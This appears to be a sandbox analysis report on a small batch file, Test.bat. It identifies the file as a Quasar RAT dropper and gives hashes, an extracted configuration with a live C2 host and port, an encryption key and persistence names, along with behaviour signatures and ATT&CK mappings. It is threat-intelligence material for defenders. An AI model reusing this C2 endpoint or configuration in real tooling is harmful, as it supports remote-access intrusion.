Overview

overview

10

Static

static

1

Test.bat

windows7-x64

8

Test.bat

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Test.bat

  • Size

    186B

  • Sample

    240530-p67b8ahd4z

  • MD5

    9c4d95c3db51f66fed113f3f97c634ed

  • SHA1

    4aa3b2737d2883c3546ba198dbfe01354ed280b3

  • SHA256

    624dddefe23183f69741089a3a0a54a6d5fe8b95d12479dba2a5972880c7013a

  • SHA512

    ed3e20e2123239d57b8e9da07c576cd9255ab386ba33025077ce7eb125a1a018375381c1886a1312d478930b4844149ece2f8f21f0972c200f154b5b5790cf9b

Score
10/10
quasarastro-1executionspywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Astro-1

C2

arthurus36.duckdns.org:5555

Mutex

ad7cd985-5e2e-45a3-9246-b82449c7c4d8

Attributes
  • encryption_key

    6314C8C60AA1035CEB920FD38F0342E398BAF5D0

  • install_name

    cmdprmpt.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    systemdex

Targets

    • Target

      Test.bat

    • Size

      186B

    • MD5

      9c4d95c3db51f66fed113f3f97c634ed

    • SHA1

      4aa3b2737d2883c3546ba198dbfe01354ed280b3

    • SHA256

      624dddefe23183f69741089a3a0a54a6d5fe8b95d12479dba2a5972880c7013a

    • SHA512

      ed3e20e2123239d57b8e9da07c576cd9255ab386ba33025077ce7eb125a1a018375381c1886a1312d478930b4844149ece2f8f21f0972c200f154b5b5790cf9b

    Score
    10/10
    executionquasarastro-1spywaretrojan

    • Quasar RAT

      Quasar is an open source Remote Access Tool.

      trojanspywarequasar

    • Quasar payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Powershell Invoke Web Request.

      execution

    • Downloads MZ/PE file

    • Executes dropped EXE

    • Legitimate hosting services abused for malware hosting/C2

    • Drops file in System32 directory

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Scheduled Task/Job

1
T1053

Persistence

Scheduled Task/Job

1
T1053

Privilege Escalation

Scheduled Task/Job

1
T1053

Defense Evasion

Credential Access

Discovery

Query Registry

1
T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1
T1102

Impact

Resource Development

Reconnaissance

Tasks